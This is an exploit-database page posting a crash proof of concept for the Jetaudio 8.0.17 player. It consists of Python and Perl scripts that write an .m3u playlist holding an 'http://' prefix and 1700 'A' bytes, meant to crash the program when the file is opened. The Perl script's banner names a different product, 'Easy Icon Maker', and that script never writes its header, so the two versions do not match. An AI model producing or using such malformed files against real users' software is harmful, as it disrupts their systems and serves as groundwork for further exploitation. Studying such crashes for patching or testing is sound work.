Jetaudio 8.0.17 Crash Proof Of Concept



EKU-ID: 3423 CVE: OSVDB-ID:
Author: The Black Devils Published: 2013-08-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm The Black Devils member from Inj3ct0r Team         1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Jetaudio 8.0.17 basic Crash PoC
# Date: 18-07-2013
# Exploit Author: The Black Devils "Asesino04"
# Vendor Homepage: http://www.jetaudio.com/download/
# Version: 8.0.17 & old versions
# Tested on: [ Windows 7]
  
  
# Introduction :
-----------------
Jetaudio 8.0.17 basic is suffering from a crash poc vulnerability
  
  
# Exploit Code (python) :
------------------
# !/usr/bin/python
header="http://"
poc= "\x41" * 1700
file = open("asesino04.m3u","w")
file.write(header+poc)
file.close()
-------------------
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";
print " |=======================================================|\n";
print " |= [!] Name : Easy Icon Maker Version =|\n";
print " |= [!] Exploit : Crash Exploit =|\n";
print " |= [!] Author : The Black Devils =|\n";
print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";
print " |=======================================================|\n";
sleep(2);
print "\n";
  
# Creating ...
my $header="http://" ;
my $PoC = "\x41" x 1700 ; #
open(file , ">", "inj3ct0rs.m3u");
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";
close(file);
  
  
  
  
References:
http://downloads.securityfocus.com/vulnerabilities/exploits/61400.py
http://packetstormsecurity.com/files/122504/Jetaudio-8.0.17-Crash-Proof-Of-Concept.html
http://cxsecurity.com/issue/WLB-2013070167
  
# Contact :
------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com